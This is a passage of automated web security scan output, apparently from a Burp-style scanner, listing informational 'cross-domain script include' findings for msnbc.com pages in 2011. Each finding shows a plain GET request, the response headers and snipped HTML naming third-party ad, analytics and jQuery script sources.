Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:10 GMT
Date: Sat, 29 Jan 2011 23:54:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 34896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><title>Rachel Maddow Show</title
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...

23.471. http://www.msnbc.redacted/id/26613008/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/26613008/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/26613008/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 40351


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.redacted/i/MSNBC/Components/ArtAndPhoto-Fronts/Users/Fred/AdReady/msnbc_StartPAgev2.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.472. http://www.msnbc.redacted/id/27365695/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/27365695/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/27365695/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
ETag: "634285663107700000"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 96597

<html xmlns:tvservices="http://www.msnbc.com"><head><title>Careers - About- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2556"></script>
...[SNIP]...
</script>

<script src="http://edge.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

23.473. http://www.msnbc.redacted/id/3032072/ns/business

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032072/ns/business

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /id/3032072/ns/business HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:06 GMT
Date: Sat, 29 Jan 2011 23:54:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 189439

<html><head><title>Business &amp; financial news headlines, latest market updates, breaking news on the economy, real estate and personal finance- msnbc.com</title><link rel="stylesheet" type="text/cs
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...

23.474. http://www.msnbc.redacted/id/3032076/ns/health

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032076/ns/health

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3032076/ns/health HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:03 GMT
Date: Sat, 29 Jan 2011 23:54:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 169703

<html><head><title>Health, Diet and Nutrition News &amp; Information - Read Current Articles, Men's, Women's and Children Health - MSNBC.com- msnbc.com</title><link rel="stylesheet" type="text/css" hr
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/034CFD04-A960-11DF-9090-D37F3FF5047F" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/27EE5888-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

23.475. http://www.msnbc.redacted/id/3032118/ns/technology_and_science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032118/ns/technology_and_science

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:43 GMT
Date: Sat, 29 Jan 2011 23:53:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 176958

<html><head><title>Technology &amp; Science Breaking News Leader - MSNBC - Get the Latest Computer, Space, Gadgets, and Tech Innovation Headlines from Across the World- msnbc.com</title><link rel="sty
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...

23.476. http://www.msnbc.redacted/id/3032507/ns/world_news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032507/ns/world_news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3032507/ns/world_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:40 GMT
Date: Sat, 29 Jan 2011 23:53:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 162755

<html><head><title>World News - Daily International Stories from Around the World- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/cs
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

23.477. http://www.msnbc.redacted/id/3032525/ns/us_news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032525/ns/us_news

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3032525/ns/us_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:39 GMT
Date: Sat, 29 Jan 2011 23:53:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 167360

<html><head><title>US News - Current Education, Business and Security Headlines from Across the US- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

23.478. http://www.msnbc.redacted/id/3032553/ns/politics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032553/ns/politics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3032553/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:42 GMT
Date: Sat, 29 Jan 2011 23:53:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 145418

<html><head><title>Politics - Political News &amp; Updates- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/
...[SNIP]...
<link rel="apple-touch-icon" href="http://msnbcmedia.redacted/i/msnbc/Components/ArtAndPhoto-Fronts/SITEWIDE/apple-touch-icon.png"/><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/0376BB26-A960-11DF-9090-D37F3FF5047F" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F" type="text/javascript"></script>
...[SNIP]...

23.479. http://www.msnbc.redacted/id/3032619/ns/nightly_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032619/ns/nightly_news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3032619/ns/nightly_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:02 GMT
Date: Sat, 29 Jan 2011 23:54:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 92160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><title>NBC Nightly News with Bri
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</ul><script src="http://ar.voicefive.com/bmx3/node.pli?pub=starcomCustom"></script>
...[SNIP]...

23.480. http://www.msnbc.redacted/id/3032619/vp/41328231

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032619/vp/41328231

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3032619/vp/41328231 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:54:12 GMT
Date: Sun, 30 Jan 2011 01:54:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 92209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns=http://www.w3.org/1999/xhtml><head><title>NBC Nightly News with Bri
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
</ul><script src="http://ar.voicefive.com/bmx3/node.pli?pub=starcomCustom"></script>
...[SNIP]...

23.481. http://www.msnbc.redacted/id/3053415/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3053415/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3053415/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:55:02 GMT
Date: Sun, 30 Jan 2011 01:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 207572

<html><head><title>Breaking News, Weather, Business, Health, Entertainment, Sports, Politics, Travel, Science, Technology, Local, US &amp; World News - msnbc.com</title><link rel="stylesheet" type="te
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
<!-- gss styles -->
<script src="http://ajax.microsoft.com/ajax/jquery.cycle/2.88/jquery.cycle.all.min.js" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/91263EC8-A727-11DF-BD32-51423FF5047F" type="text/javascript"></script>
...[SNIP]...

23.482. http://www.msnbc.redacted/id/3303511/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3303511/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3303511/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 42854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1c.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.483. http://www.msnbc.redacted/id/3303540/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3303540/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/3303540/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 58189


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.484. http://www.msnbc.redacted/id/37643077

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/37643077

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/37643077 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 111208


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.485. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41164445/ns/world_news-africa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41164445/ns/world_news-africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60561


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.486. http://www.msnbc.redacted/id/41253088/ns/technology_and_science-science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41253088/ns/technology_and_science-science

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41253088/ns/technology_and_science-science?GT1=43001 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 63050


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/site_wide_print.css" />

<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7542"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.487. http://www.msnbc.redacted/id/41311073/ns/business-consumer_news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41311073/ns/business-consumer_news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41311073/ns/business-consumer_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 29 Jan 2011 23:55:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 64384


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.redacted/j/MSNBC/Components/Photo/_new/tz-biz-110125-tacobell-134p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section -->
<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.488. http://www.msnbc.redacted/id/41316837/ns/world_news-mideastn_africa/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/41316837/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/41316837/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 84440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.redacted/j/MSNBC/Components/Photo/_new/110128-stephen-zunes-1220p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- End ad scripts --><script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
